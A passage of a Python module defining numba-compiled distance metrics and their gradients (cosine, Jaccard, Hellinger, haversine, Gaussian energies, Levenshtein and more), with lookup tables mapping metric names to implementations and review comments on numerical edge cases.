    A vanishing normaliser yields distance 0 with a zero gradient.
    """
    numerator = 0.0
    denominator = 0.0
    for i in range(x.shape[0]):
        numerator += np.abs(x[i] - y[i])
        denominator += np.abs(x[i] + y[i])
    if denominator > 0.0:
        dist = float(numerator) / denominator
        grad = (np.sign(x - y) - dist) / denominator
    else:
        dist = 0.0
        grad = np.zeros(x.shape)
    return dist, grad
@numba.njit()
def jaccard(x, y):
    """Jaccard distance on the supports of x and y (nonzero coordinates)."""
    n_union = 0.0
    n_intersection = 0.0
    for i in range(x.shape[0]):
        x_nonzero = x[i] != 0
        y_nonzero = y[i] != 0
        n_union += x_nonzero or y_nonzero
        n_intersection += x_nonzero and y_nonzero
    if n_union == 0.0:
        return 0.0
    return float(n_union - n_intersection) / n_union
@numba.njit()
def matching(x, y):
    """Fraction of coordinates where exactly one of x, y is nonzero."""
    n_disagree = 0.0
    for i in range(x.shape[0]):
        n_disagree += (x[i] != 0) != (y[i] != 0)
    return float(n_disagree) / x.shape[0]
@numba.njit()
def dice(x, y):
    """Dice dissimilarity on binarised vectors (nonzero == True)."""
    n_both = 0.0
    n_disagree = 0.0
    for i in range(x.shape[0]):
        x_on = x[i] != 0
        y_on = y[i] != 0
        n_both += x_on and y_on
        n_disagree += x_on != y_on
    if n_disagree == 0.0:
        return 0.0
    return n_disagree / (2.0 * n_both + n_disagree)
@numba.njit()
def kulsinski(x, y):
    """Kulsinski dissimilarity on binarised vectors (nonzero == True)."""
    n_both = 0.0
    n_disagree = 0.0
    for i in range(x.shape[0]):
        x_on = x[i] != 0
        y_on = y[i] != 0
        n_both += x_on and y_on
        n_disagree += x_on != y_on
    if n_disagree == 0:
        return 0.0
    return float(n_disagree - n_both + x.shape[0]) / (
        n_disagree + x.shape[0]
    )
@numba.njit()
def rogers_tanimoto(x, y):
    """Rogers-Tanimoto dissimilarity on binarised vectors."""
    n_disagree = 0.0
    for i in range(x.shape[0]):
        n_disagree += (x[i] != 0) != (y[i] != 0)
    return (2.0 * n_disagree) / (x.shape[0] + n_disagree)
@numba.njit()
def russellrao(x, y):
    """Russell-Rao dissimilarity; identical full supports give distance 0."""
    n_both = 0.0
    for i in range(x.shape[0]):
        n_both += (x[i] != 0) and (y[i] != 0)
    if n_both == np.sum(x != 0) and n_both == np.sum(y != 0):
        return 0.0
    return float(x.shape[0] - n_both) / (x.shape[0])
@numba.njit()
def sokal_michener(x, y):
    """Sokal-Michener dissimilarity on binarised vectors."""
    n_disagree = 0.0
    for i in range(x.shape[0]):
        n_disagree += (x[i] != 0) != (y[i] != 0)
    return (2.0 * n_disagree) / (x.shape[0] + n_disagree)
@numba.njit()
def sokal_sneath(x, y):
    """Sokal-Sneath dissimilarity on binarised vectors (nonzero == True)."""
    n_both = 0.0
    n_disagree = 0.0
    for i in range(x.shape[0]):
        x_on = x[i] != 0
        y_on = y[i] != 0
        n_both += x_on and y_on
        n_disagree += x_on != y_on
    if n_disagree == 0.0:
        return 0.0
    return n_disagree / (0.5 * n_both + n_disagree)
@numba.njit()
def haversine(x, y):
    """Haversine (great-circle) distance between two (lat, long) points in radians."""
    if x.shape[0] != 2:
        raise ValueError("haversine is only defined for 2 dimensional data")
    half_dlat_sin = np.sin(0.5 * (x[0] - y[0]))
    half_dlong_sin = np.sin(0.5 * (x[1] - y[1]))
    h = half_dlat_sin ** 2 + np.cos(x[0]) * np.cos(y[0]) * half_dlong_sin ** 2
    return 2.0 * np.arcsin(np.sqrt(h))
@numba.njit()
def haversine_grad(x, y):
    """Haversine distance and its gradient for 2-d (latitude, longitude) inputs."""
    # spectral initialization puts many points near the poles
    # currently, adding pi/2 to the latitude avoids problems
    # TODO: reimplement with quaternions to avoid singularity
    if x.shape[0] != 2:
        raise ValueError("haversine is only defined for 2 dimensional data")
    sin_lat = np.sin(0.5 * (x[0] - y[0]))
    cos_lat = np.cos(0.5 * (x[0] - y[0]))
    sin_long = np.sin(0.5 * (x[1] - y[1]))
    cos_long = np.cos(0.5 * (x[1] - y[1]))
    a_0 = np.cos(x[0] + np.pi / 2) * np.cos(y[0] + np.pi / 2) * sin_long ** 2
    a_1 = a_0 + sin_lat ** 2
    # Clamp the arcsin argument into [0, 1] for numerical safety.
    d = 2.0 * np.arcsin(np.sqrt(min(max(abs(a_1), 0), 1)))
    denom = np.sqrt(abs(a_1 - 1)) * np.sqrt(abs(a_1))
    grad = (
        np.array(
            [
                (
                    sin_lat * cos_lat
                    - np.sin(x[0] + np.pi / 2)
                    * np.cos(y[0] + np.pi / 2)
                    * sin_long ** 2
                ),
                (
                    np.cos(x[0] + np.pi / 2)
                    * np.cos(y[0] + np.pi / 2)
                    * sin_long
                    * cos_long
                ),
            ]
        )
        / (denom + 1e-6)  # epsilon guards the singularity when a_1 is 0 or 1
    )
    return d, grad
@numba.njit()
def yule(x, y):
    """Yule dissimilarity on binarised vectors (nonzero == True)."""
    n_tt = 0.0
    n_tf = 0.0
    n_ft = 0.0
    for i in range(x.shape[0]):
        x_on = x[i] != 0
        y_on = y[i] != 0
        n_tt += x_on and y_on
        n_tf += x_on and (not y_on)
        n_ft += (not x_on) and y_on
    n_ff = x.shape[0] - n_tt - n_tf - n_ft
    if n_tf == 0.0 or n_ft == 0.0:
        return 0.0
    return (2.0 * n_tf * n_ft) / (n_tt * n_ff + n_tf * n_ft)
@numba.njit()
def cosine(x, y):
    """Cosine distance, with all-zero vectors handled explicitly."""
    dot = 0.0
    sq_norm_x = 0.0
    sq_norm_y = 0.0
    for i in range(x.shape[0]):
        dot += x[i] * y[i]
        sq_norm_x += x[i] ** 2
        sq_norm_y += y[i] ** 2
    if sq_norm_x == 0.0 and sq_norm_y == 0.0:
        return 0.0
    if sq_norm_x == 0.0 or sq_norm_y == 0.0:
        return 1.0
    return 1.0 - (dot / np.sqrt(sq_norm_x * sq_norm_y))
@numba.njit(fastmath=True)
def cosine_grad(x, y):
    """Cosine distance and its gradient w.r.t. x.

    Degenerate (all-zero) vectors get a zero gradient.
    """
    result = 0.0
    norm_x = 0.0
    norm_y = 0.0
    for i in range(x.shape[0]):
        result += x[i] * y[i]
        norm_x += x[i] ** 2
        norm_y += y[i] ** 2
    if norm_x == 0.0 and norm_y == 0.0:
        dist = 0.0
        grad = np.zeros(x.shape)
    elif norm_x == 0.0 or norm_y == 0.0:
        dist = 1.0
        grad = np.zeros(x.shape)
    else:
        grad = -(x * result - y * norm_x) / np.sqrt(norm_x ** 3 * norm_y)
        dist = 1.0 - (result / np.sqrt(norm_x * norm_y))
    return dist, grad
@numba.njit()
def correlation(x, y):
    """Correlation distance: 1 - Pearson correlation of x and y."""
    mean_x = 0.0
    mean_y = 0.0
    for i in range(x.shape[0]):
        mean_x += x[i]
        mean_y += y[i]
    mean_x /= x.shape[0]
    mean_y /= x.shape[0]
    sq_dev_x = 0.0
    sq_dev_y = 0.0
    cov = 0.0
    for i in range(x.shape[0]):
        dev_x = x[i] - mean_x
        dev_y = y[i] - mean_y
        sq_dev_x += dev_x ** 2
        sq_dev_y += dev_y ** 2
        cov += dev_x * dev_y
    if sq_dev_x == 0.0 and sq_dev_y == 0.0:
        return 0.0
    if cov == 0.0:
        return 1.0
    return 1.0 - (cov / np.sqrt(sq_dev_x * sq_dev_y))
@numba.njit()
def hellinger(x, y):
    """Hellinger distance between two nonnegative vectors, normalised by their L1 norms."""
    bc = 0.0  # unnormalised Bhattacharyya coefficient
    sum_x = 0.0
    sum_y = 0.0
    for i in range(x.shape[0]):
        bc += np.sqrt(x[i] * y[i])
        sum_x += x[i]
        sum_y += y[i]
    if sum_x == 0 and sum_y == 0:
        return 0.0
    if sum_x == 0 or sum_y == 0:
        return 1.0
    return np.sqrt(1 - bc / np.sqrt(sum_x * sum_y))
@numba.njit()
def hellinger_grad(x, y):
    """Hellinger distance and its gradient w.r.t. x.

    NOTE(review): the gradient divides by grad_term = sqrt(x*y) elementwise,
    so coordinates where x[i]*y[i] == 0 produce a division by zero — confirm
    inputs are strictly positive where this is used.
    """
    result = 0.0
    l1_norm_x = 0.0
    l1_norm_y = 0.0
    grad_term = np.empty(x.shape[0])
    for i in range(x.shape[0]):
        grad_term[i] = np.sqrt(x[i] * y[i])
        result += grad_term[i]
        l1_norm_x += x[i]
        l1_norm_y += y[i]
    if l1_norm_x == 0 and l1_norm_y == 0:
        dist = 0.0
        grad = np.zeros(x.shape)
    elif l1_norm_x == 0 or l1_norm_y == 0:
        dist = 1.0
        grad = np.zeros(x.shape)
    else:
        dist_denom = np.sqrt(l1_norm_x * l1_norm_y)
        dist = np.sqrt(1 - result / dist_denom)
        grad_denom = 2 * dist
        grad_numer_const = (l1_norm_y * result) / (2 * dist_denom ** 3)
        grad = (grad_numer_const - (y / grad_term * dist_denom)) / grad_denom
    return dist, grad
@numba.njit()
def approx_log_Gamma(x):
    """Stirling-series approximation of log(Gamma(x)); exact 0 for x == 1."""
    if x == 1:
        return 0
    # x2= 1/(x*x);
    # Stirling expansion truncated after the 1/(12x) term; the commented-out
    # tail below lists the higher-order correction terms.
    return x * np.log(x) - x + 0.5 * np.log(2.0 * np.pi / x) + 1.0 / (x * 12.0)
    # + x2*(-1.0/360.0) + x2* (1.0/1260.0 + x2*(-1.0/(1680.0) +\
    # x2*(1.0/1188.0 + x2*(-691.0/360360.0 + x2*(1.0/156.0 +\
    # x2*(-3617.0/122400.0 + x2*(43687.0/244188.0 + x2*(-174611.0/125400.0) +\
    # x2*(77683.0/5796.0 + x2*(-236364091.0/1506960.0 + x2*(657931.0/300.0))))))))))))
@numba.njit()
def log_beta(x, y):
    """log of the Beta function B(x, y).

    For small arguments (b < 5) the value is built exactly from the product
    form; otherwise the Stirling approximation of log-Gamma is used.
    """
    a = min(x, y)
    b = max(x, y)
    if b < 5:
        value = -np.log(b)
        for i in range(1, int(a)):
            value += np.log(i) - np.log(b + i)
        return value
    else:
        return approx_log_Gamma(x) + approx_log_Gamma(y) - approx_log_Gamma(x + y)
@numba.njit()
def log_single_beta(x):
    """Approximation of log(B(x, x)) (the "diagonal" Beta function).

    The commented-out tail lists higher-order series correction terms.
    """
    return np.log(2.0) * (-2.0 * x + 0.5) + 0.5 * np.log(2.0 * np.pi / x) + 0.125 / x
    # + x2*(-1.0/192.0 + x2* (1.0/640.0 + x2*(-17.0/(14336.0) +\
    # x2*(31.0/18432.0 + x2*(-691.0/180224.0 +\
    # x2*(5461.0/425984.0 + x2*(-929569.0/15728640.0 +\
    # x2*(3189151.0/8912896.0 + x2*(-221930581.0/79691776.0) +\
    # x2*(4722116521.0/176160768.0 + x2*(-968383680827.0/3087007744.0 +\
    # x2*(14717667114151.0/3355443200.0 ))))))))))))
@numba.njit()
def ll_dirichlet(data1, data2):
    """The symmetric relative log likelihood of rolling data2 vs data1
    in n trials on a die that rolled data1 in sum(data1) trials.
    ..math::
        D(data1, data2) = DirichletMultinomail(data2 | data1)
    """
    n1 = np.sum(data1)
    n2 = np.sum(data2)
    log_b = 0.0
    self_denom1 = 0.0
    self_denom2 = 0.0
    for i in range(data1.shape[0]):
        # The 0.9 threshold means "count is at least 1", tolerating
        # float-valued count data.
        if data1[i] * data2[i] > 0.9:
            log_b += log_beta(data1[i], data2[i])
            self_denom1 += log_single_beta(data1[i])
            self_denom2 += log_single_beta(data2[i])
        else:
            if data1[i] > 0.9:
                self_denom1 += log_single_beta(data1[i])
            if data2[i] > 0.9:
                self_denom2 += log_single_beta(data2[i])
    # Symmetrise by averaging the two directed log-likelihood terms.
    return np.sqrt(
        1.0 / n2 * (log_b - log_beta(n1, n2) - (self_denom2 - log_single_beta(n2)))
        + 1.0 / n1 * (log_b - log_beta(n2, n1) - (self_denom1 - log_single_beta(n1)))
    )
@numba.njit(fastmath=True)
def symmetric_kl(x, y, z=1e-11):  # pragma: no cover
    r"""
    symmetrized KL divergence between two probability distributions
    ..math::
        D(x, y) = \frac{D_{KL}\left(x \Vert y\right) + D_{KL}\left(y \Vert x\right)}{2}

    WARNING: x and y are smoothed by z and renormalised *in place*; the
    caller's arrays are modified.
    """
    n = x.shape[0]
    x_sum = 0.0
    y_sum = 0.0
    kl1 = 0.0
    kl2 = 0.0
    for i in range(n):
        x[i] += z
        x_sum += x[i]
        y[i] += z
        y_sum += y[i]
    for i in range(n):
        x[i] /= x_sum
        y[i] /= y_sum
    for i in range(n):
        kl1 += x[i] * np.log(x[i] / y[i])
        kl2 += y[i] * np.log(y[i] / x[i])
    return (kl1 + kl2) / 2
@numba.njit(fastmath=True)
def symmetric_kl_grad(x, y, z=1e-11):  # pragma: no cover
    """
    symmetrized KL divergence and its gradient

    WARNING: x and y are smoothed by z and renormalised *in place*; the
    caller's arrays are modified.
    """
    n = x.shape[0]
    x_sum = 0.0
    y_sum = 0.0
    kl1 = 0.0
    kl2 = 0.0
    for i in range(n):
        x[i] += z
        x_sum += x[i]
        y[i] += z
        y_sum += y[i]
    for i in range(n):
        x[i] /= x_sum
        y[i] /= y_sum
    for i in range(n):
        kl1 += x[i] * np.log(x[i] / y[i])
        kl2 += y[i] * np.log(y[i] / x[i])
    dist = (kl1 + kl2) / 2
    # Gradient w.r.t. x of the symmetrised divergence (elementwise).
    grad = (np.log(y / x) - (x / y) + 1) / 2
    return dist, grad
@numba.njit()
def correlation_grad(x, y):
    """Correlation distance (1 - Pearson correlation) and its gradient w.r.t. x."""
    mu_x = 0.0
    mu_y = 0.0
    norm_x = 0.0
    norm_y = 0.0
    dot_product = 0.0
    for i in range(x.shape[0]):
        mu_x += x[i]
        mu_y += y[i]
    mu_x /= x.shape[0]
    mu_y /= x.shape[0]
    for i in range(x.shape[0]):
        shifted_x = x[i] - mu_x
        shifted_y = y[i] - mu_y
        norm_x += shifted_x ** 2
        norm_y += shifted_y ** 2
        dot_product += shifted_x * shifted_y
    # Degenerate cases (constant vectors / orthogonal deviations) get a
    # zero gradient to avoid division by zero below.
    if norm_x == 0.0 and norm_y == 0.0:
        dist = 0.0
        grad = np.zeros(x.shape)
    elif dot_product == 0.0:
        dist = 1.0
        grad = np.zeros(x.shape)
    else:
        dist = 1.0 - (dot_product / np.sqrt(norm_x * norm_y))
        grad = ((x - mu_x) / norm_x - (y - mu_y) / dot_product) * dist
    return dist, grad
@numba.njit(fastmath=True)
def sinkhorn_distance(
    x, y, M=_mock_identity, cost=_mock_cost, maxiter=64
):  # pragma: no cover
    """Sinkhorn approximation of the transport distance between x and y.

    x and y are normalised into probability vectors p and q; ``maxiter``
    Sinkhorn scaling iterations are run against kernel M, then the transport
    plan is evaluated against the ground ``cost`` matrix.
    """
    p = (x / x.sum()).astype(np.float32)
    q = (y / y.sum()).astype(np.float32)
    u = np.ones(p.shape, dtype=np.float32)
    v = np.ones(q.shape, dtype=np.float32)
    for n in range(maxiter):
        # Alternate row/column scaling; zero entries of the kernel product
        # are skipped to avoid division by zero.
        t = M @ v
        u[t > 0] = p[t > 0] / t[t > 0]
        t = M.T @ u
        v[t > 0] = q[t > 0] / t[t > 0]
    pi = np.diag(v) @ M @ np.diag(u)
    result = 0.0
    for i in range(pi.shape[0]):
        for j in range(pi.shape[1]):
            if pi[i, j] > 0:
                result += pi[i, j] * cost[i, j]
    return result
@numba.njit(fastmath=True)
def spherical_gaussian_energy_grad(x, y):  # pragma: no cover
    """Energy (negative log-likelihood style) distance between two spherical
    Gaussians parameterised as (mu_1, mu_2, sigma), plus its gradient."""
    mu_1 = x[0] - y[0]
    mu_2 = x[1] - y[1]
    # Combined variance; absolute values keep it positive.
    sigma = np.abs(x[2]) + np.abs(y[2])
    sign_sigma = np.sign(x[2])
    dist = (mu_1 ** 2 + mu_2 ** 2) / (2 * sigma) + np.log(sigma) + np.log(2 * np.pi)
    grad = np.empty(3, np.float32)
    grad[0] = mu_1 / sigma
    grad[1] = mu_2 / sigma
    grad[2] = sign_sigma * (1.0 / sigma - (mu_1 ** 2 + mu_2 ** 2) / (2 * sigma ** 2))
    return dist, grad
@numba.njit(fastmath=True)
def diagonal_gaussian_energy_grad(x, y):  # pragma: no cover
    """Energy distance between two axis-aligned (diagonal-covariance)
    Gaussians parameterised as (mu_1, mu_2, sigma_1, sigma_2), with gradient.

    NOTE(review): grad is allocated with 6 entries but only indices 0-3 are
    written, leaving 4-5 uninitialised — confirm the expected embedding
    dimension for this energy.
    """
    mu_1 = x[0] - y[0]
    mu_2 = x[1] - y[1]
    sigma_11 = np.abs(x[2]) + np.abs(y[2])
    sigma_12 = 0.0
    sigma_22 = np.abs(x[3]) + np.abs(y[3])
    det = sigma_11 * sigma_22
    sign_s1 = np.sign(x[2])
    sign_s2 = np.sign(x[3])
    if det == 0.0:
        # TODO: figure out the right thing to do here
        return mu_1 ** 2 + mu_2 ** 2, np.array([0.0, 0.0, 1.0, 1.0], dtype=np.float32)
    cross_term = 2 * sigma_12
    m_dist = (
        np.abs(sigma_22) * (mu_1 ** 2)
        - cross_term * mu_1 * mu_2
        + np.abs(sigma_11) * (mu_2 ** 2)
    )
    dist = (m_dist / det + np.log(np.abs(det))) / 2.0 + np.log(2 * np.pi)
    grad = np.empty(6, dtype=np.float32)
    grad[0] = (2 * sigma_22 * mu_1 - cross_term * mu_2) / (2 * det)
    grad[1] = (2 * sigma_11 * mu_2 - cross_term * mu_1) / (2 * det)
    grad[2] = sign_s1 * (sigma_22 * (det - m_dist) + det * mu_2 ** 2) / (2 * det ** 2)
    grad[3] = sign_s2 * (sigma_11 * (det - m_dist) + det * mu_1 ** 2) / (2 * det ** 2)
    return dist, grad
@numba.njit(fastmath=True)
def gaussian_energy_grad(x, y):  # pragma: no cover
    """Energy distance between two full 2-d Gaussians parameterised as
    (mu_1, mu_2, width, height, angle), plus its 5-d gradient.

    WARNING: x and y are clamped *in place* (widths/heights made positive,
    angle wrapped via arcsin(sin(.))) before use.
    """
    mu_1 = x[0] - y[0]
    mu_2 = x[1] - y[1]
    # Ensure width are positive
    x[2] = np.abs(x[2])
    y[2] = np.abs(y[2])
    # Ensure heights are positive
    x[3] = np.abs(x[3])
    y[3] = np.abs(y[3])
    # Ensure angle is in range -pi,pi
    x[4] = np.arcsin(np.sin(x[4]))
    y[4] = np.arcsin(np.sin(y[4]))
    # Covariance entries for y
    a = y[2] * np.cos(y[4]) ** 2 + y[3] * np.sin(y[4]) ** 2
    b = (y[2] - y[3]) * np.sin(y[4]) * np.cos(y[4])
    c = y[3] * np.cos(y[4]) ** 2 + y[2] * np.sin(y[4]) ** 2
    # Sum of covariance matrices
    sigma_11 = x[2] * np.cos(x[4]) ** 2 + x[3] * np.sin(x[4]) ** 2 + a
    sigma_12 = (x[2] - x[3]) * np.sin(x[4]) * np.cos(x[4]) + b
    sigma_22 = x[2] * np.sin(x[4]) ** 2 + x[3] * np.cos(x[4]) ** 2 + c
    # Determinant of the sum of covariances
    det_sigma = np.abs(sigma_11 * sigma_22 - sigma_12 ** 2)
    x_inv_sigma_y_numerator = (
        sigma_22 * mu_1 ** 2 - 2 * sigma_12 * mu_1 * mu_2 + sigma_11 * mu_2 ** 2
    )
    if det_sigma < 1e-32:
        # Near-singular covariance: fall back to squared Euclidean distance.
        return (
            mu_1 ** 2 + mu_2 ** 2,
            np.array([0.0, 0.0, 1.0, 1.0, 0.0], dtype=np.float32),
        )
    dist = x_inv_sigma_y_numerator / det_sigma + np.log(det_sigma) + np.log(2 * np.pi)
    grad = np.zeros(5, np.float32)
    grad[0] = (2 * sigma_22 * mu_1 - 2 * sigma_12 * mu_2) / det_sigma
    grad[1] = (2 * sigma_11 * mu_2 - 2 * sigma_12 * mu_1) / det_sigma
    # Gradient w.r.t. width (x[2]); quotient rule over det_sigma.
    grad[2] = mu_2 * (mu_2 * np.cos(x[4]) ** 2 - mu_1 * np.cos(x[4]) * np.sin(x[4]))
    grad[2] += mu_1 * (mu_1 * np.sin(x[4]) ** 2 - mu_2 * np.cos(x[4]) * np.sin(x[4]))
    grad[2] *= det_sigma
    grad[2] -= x_inv_sigma_y_numerator * np.cos(x[4]) ** 2 * sigma_22
    grad[2] -= x_inv_sigma_y_numerator * np.sin(x[4]) ** 2 * sigma_11
    grad[2] += x_inv_sigma_y_numerator * 2 * sigma_12 * np.sin(x[4]) * np.cos(x[4])
    grad[2] /= det_sigma ** 2 + 1e-8
    # Gradient w.r.t. height (x[3]).
    grad[3] = mu_1 * (mu_1 * np.cos(x[4]) ** 2 - mu_2 * np.cos(x[4]) * np.sin(x[4]))
    grad[3] += mu_2 * (mu_2 * np.sin(x[4]) ** 2 - mu_1 * np.cos(x[4]) * np.sin(x[4]))
    grad[3] *= det_sigma
    grad[3] -= x_inv_sigma_y_numerator * np.sin(x[4]) ** 2 * sigma_22
    grad[3] -= x_inv_sigma_y_numerator * np.cos(x[4]) ** 2 * sigma_11
    grad[3] -= x_inv_sigma_y_numerator * 2 * sigma_12 * np.sin(x[4]) * np.cos(x[4])
    grad[3] /= det_sigma ** 2 + 1e-8
    # Gradient w.r.t. angle (x[4]).
    grad[4] = (x[3] - x[2]) * (
        2 * mu_1 * mu_2 * np.cos(2 * x[4]) - (mu_1 ** 2 - mu_2 ** 2) * np.sin(2 * x[4])
    )
    grad[4] *= det_sigma
    grad[4] -= x_inv_sigma_y_numerator * (x[3] - x[2]) * np.sin(2 * x[4]) * sigma_22
    grad[4] -= x_inv_sigma_y_numerator * (x[2] - x[3]) * np.sin(2 * x[4]) * sigma_11
    grad[4] -= x_inv_sigma_y_numerator * 2 * sigma_12 * (x[2] - x[3]) * np.cos(2 * x[4])
    grad[4] /= det_sigma ** 2 + 1e-8
    return dist, grad
@numba.njit(fastmath=True)
def spherical_gaussian_grad(x, y):  # pragma: no cover
    """Spherical-Gaussian energy with a signed (unclamped) combined sigma,
    plus its gradient; a zero sigma returns a fixed penalty."""
    mu_1 = x[0] - y[0]
    mu_2 = x[1] - y[1]
    sigma = x[2] + y[2]
    sigma_sign = np.sign(sigma)
    if sigma == 0:
        # Degenerate variance: fixed distance, push sigma away from zero.
        return 10.0, np.array([0.0, 0.0, -1.0], dtype=np.float32)
    dist = (
        (mu_1 ** 2 + mu_2 ** 2) / np.abs(sigma)
        + 2 * np.log(np.abs(sigma))
        + np.log(2 * np.pi)
    )
    grad = np.empty(3, dtype=np.float32)
    grad[0] = (2 * mu_1) / np.abs(sigma)
    grad[1] = (2 * mu_2) / np.abs(sigma)
    grad[2] = sigma_sign * (
        -(mu_1 ** 2 + mu_2 ** 2) / (sigma ** 2) + (2 / np.abs(sigma))
    )
    return dist, grad
# Special discrete distances -- where x and y are objects, not vectors
def get_discrete_params(data, metric):
    """Derive heuristic keyword parameters for the discrete metrics.

    Metrics that need no extra parameters get an empty dict.
    """
    if metric == "ordinal":
        spread = float(data.max() - data.min())
        return {"support_size": spread / 2.0}
    if metric == "count":
        lambda_ = scipy.stats.tmean(data)
        normalisation = count_distance(
            scipy.stats.tmin(data), scipy.stats.tmax(data), poisson_lambda=lambda_
        )
        return {
            "poisson_lambda": lambda_,
            "normalisation": normalisation / 2.0,  # heuristic
        }
    if metric == "string":
        longest = scipy.stats.tmax(np.array([len(x) for x in data]))
        max_dist = longest / 1.5  # heuristic
        # normalisation is half the heuristic maximum distance
        return {"normalisation": max_dist / 2.0, "max_dist": max_dist / 2.0}
    return {}
@numba.jit()
def categorical_distance(x, y):
    """0 when the two category labels agree, 1 otherwise."""
    if x != y:
        return 1.0
    return 0.0
@numba.jit()
def hierarchical_categorical_distance(x, y, cat_hierarchy=[{}]):
    """Distance between two categories under a hierarchy of groupings.

    ``cat_hierarchy`` is a sequence of mappings from category to group,
    ordered from finest (level 0) to coarsest.  The distance is
    ``level / n_levels`` for the first level at which the two categories
    share a group, and 1.0 if they never do.

    NOTE(review): the mutable default ``[{}]`` is shared across calls;
    callers should always supply their own hierarchy.
    """
    n_levels = float(len(cat_hierarchy))
    for level, cats in enumerate(cat_hierarchy):
        if cats[x] == cats[y]:
            return float(level) / n_levels
        # Fall through to the next (coarser) level.  The previous version
        # returned 1.0 on the first mismatch, so levels past the first were
        # unreachable.
    return 1.0
@numba.njit()
def ordinal_distance(x, y, support_size=1.0):
    """Absolute difference between ordinal values, scaled by the support size."""
    delta = x - y
    if delta < 0:
        delta = -delta
    return delta / support_size
@numba.jit()
def count_distance(x, y, poisson_lambda=1.0, normalisation=1.0):
    """Distance between two count values under a Poisson model.

    Sums Poisson log-pmf style terms over counts in [lo, hi), maintaining the
    running log-factorial incrementally, then scales by ``normalisation``.
    """
    lo = int(min(x, y))
    hi = int(max(x, y))
    log_lambda = np.log(poisson_lambda)
    # Seed log-factorial: exact incremental product for small lo,
    # Stirling-style approximation otherwise.
    # NOTE(review): the loop computes log((lo-1)!), matching the incremental
    # update below — confirm this offset is the intended convention.
    if lo < 2:
        log_k_factorial = 0.0
    elif lo < 10:
        log_k_factorial = 0.0
        for k in range(2, lo):
            log_k_factorial += np.log(k)
    else:
        log_k_factorial = approx_log_Gamma(lo + 1)
    result = 0.0
    for k in range(lo, hi):
        result += k * log_lambda - poisson_lambda - log_k_factorial
        log_k_factorial += np.log(k)
    return result / normalisation
@numba.njit()
def levenshtein(x, y, normalisation=1.0, max_distance=20):
    """Levenshtein (edit) distance between sequences x and y, scaled by
    ``normalisation``.

    Comparisons are capped: if the length difference alone exceeds
    ``max_distance`` the full computation is skipped, and the two-row
    dynamic program aborts early once every entry of the current row
    exceeds ``max_distance``.
    """
    x_len, y_len = len(x), len(y)
    # Opt out of some comparisons
    if abs(x_len - y_len) > max_distance:
        return abs(x_len - y_len) / normalisation
    v0 = np.arange(y_len + 1).astype(np.float64)
    v1 = np.zeros(y_len + 1)
    for i in range(x_len):
        # Cost of deleting the first i+1 characters of x.
        # (The previous version seeded v1[i] instead of v1[0].)
        v1[0] = i + 1
        for j in range(y_len):
            deletion_cost = v0[j + 1] + 1
            insertion_cost = v1[j] + 1
            # Extend the diagonal; substitution is free when characters match.
            # (The previous version used int(x[i] == y[j]) without v0[j],
            # which is not the Wagner-Fischer recurrence.)
            substitution_cost = v0[j] + int(x[i] != y[j])
            v1[j + 1] = min(deletion_cost, insertion_cost, substitution_cost)
        # Swap the row buffers; v1 is fully overwritten next iteration.
        # (The previous version aliased v0 = v1, corrupting the old row.)
        v0, v1 = v1, v0
        # Abort early if we've already exceeded max_dist
        if np.min(v0) > max_distance:
            return max_distance / normalisation
    return v0[y_len] / normalisation
# Lookup table mapping user-facing metric names (including aliases such as
# "l2" and "taxicab") to their compiled implementations.
named_distances = {
    # general minkowski distances
    "euclidean": euclidean,
    "l2": euclidean,
    "manhattan": manhattan,
    "taxicab": manhattan,
    "l1": manhattan,
    "chebyshev": chebyshev,
    "linfinity": chebyshev,
    "linfty": chebyshev,
    "linf": chebyshev,
    "minkowski": minkowski,
    "poincare": poincare,
    # Standardised/weighted distances
    "seuclidean": standardised_euclidean,
    "standardised_euclidean": standardised_euclidean,
    "wminkowski": weighted_minkowski,
    "weighted_minkowski": weighted_minkowski,
    "mahalanobis": mahalanobis,
    # Other distances
    "canberra": canberra,
    "cosine": cosine,
    "correlation": correlation,
    "hellinger": hellinger,
    "haversine": haversine,
    "braycurtis": bray_curtis,
    "ll_dirichlet": ll_dirichlet,
    "symmetric_kl": symmetric_kl,
    # Binary distances
    "hamming": hamming,
    "jaccard": jaccard,
    "dice": dice,
    "matching": matching,
    "kulsinski": kulsinski,
    "rogerstanimoto": rogers_tanimoto,
    "russellrao": russellrao,
    "sokalsneath": sokal_sneath,
    "sokalmichener": sokal_michener,
    "yule": yule,
    # Special discrete distances
    "categorical": categorical_distance,
    "ordinal": ordinal_distance,
    "hierarchical_categorical": hierarchical_categorical_distance,
    "count": count_distance,
    "string": levenshtein,
}
# As named_distances, but each entry returns (distance, gradient); used by
# optimisers that need analytic gradients.
named_distances_with_gradients = {
    # general minkowski distances
    "euclidean": euclidean_grad,
    "l2": euclidean_grad,
    "manhattan": manhattan_grad,
    "taxicab": manhattan_grad,
    "l1": manhattan_grad,
    "chebyshev": chebyshev_grad,
    "linfinity": chebyshev_grad,
    "linfty": chebyshev_grad,
    "linf": chebyshev_grad,
    "minkowski": minkowski_grad,
    # Standardised/weighted distances
    "seuclidean": standardised_euclidean_grad,
    "standardised_euclidean": standardised_euclidean_grad,
    "wminkowski": weighted_minkowski_grad,
    "weighted_minkowski": weighted_minkowski_grad,
    "mahalanobis": mahalanobis_grad,
    # Other distances
    "canberra": canberra_grad,
    "cosine": cosine_grad,
    "correlation": correlation_grad,
    "hellinger": hellinger_grad,
    "haversine": haversine_grad,
    "braycurtis": bray_curtis_grad,
    "symmetric_kl": symmetric_kl_grad,
    # Special embeddings
    "spherical_gaussian_energy": spherical_gaussian_energy_grad,
    "diagonal_gaussian_energy": diagonal_gaussian_energy_grad,
    "gaussian_energy": gaussian_energy_grad,
    "hyperboloid": hyperboloid_grad,
}
# Metrics operating on discrete (non-vector) data; their extra keyword
# parameters come from get_discrete_params.
DISCRETE_METRICS = (
    "categorical",
    "hierarchical_categorical",
    "ordinal",
    "count",
    "string",
)
# Metrics routed through the special pairwise code path.  Both the string
# names and the function objects are listed so membership tests succeed
# whichever form the caller passes.
SPECIAL_METRICS = (
    "hellinger",
    "ll_dirichlet",
    "symmetric_kl",
    "poincare",
    hellinger,
    ll_dirichlet,
    symmetric_kl,
    poincare,
)
@numba.njit(parallel=True)
def parallel_special_metric(X, Y=None, metric=hellinger):
    """Pairwise distance matrix under ``metric``.

    With Y omitted, computes the symmetric X-vs-X matrix (each pair computed
    once and mirrored); otherwise the full X-vs-Y rectangle.
    """
    if Y is None:
        result = np.zeros((X.shape[0], X.shape[0]))
        for i in range(X.shape[0]):
            for j in range(i + 1, X.shape[0]):
                result[i, j] = metric(X[i], X[j])
                result[j, i] = result[i, j]
    else:
        result = np.zeros((X.shape[0], Y.shape[0]))
        for i in range(X.shape[0]):
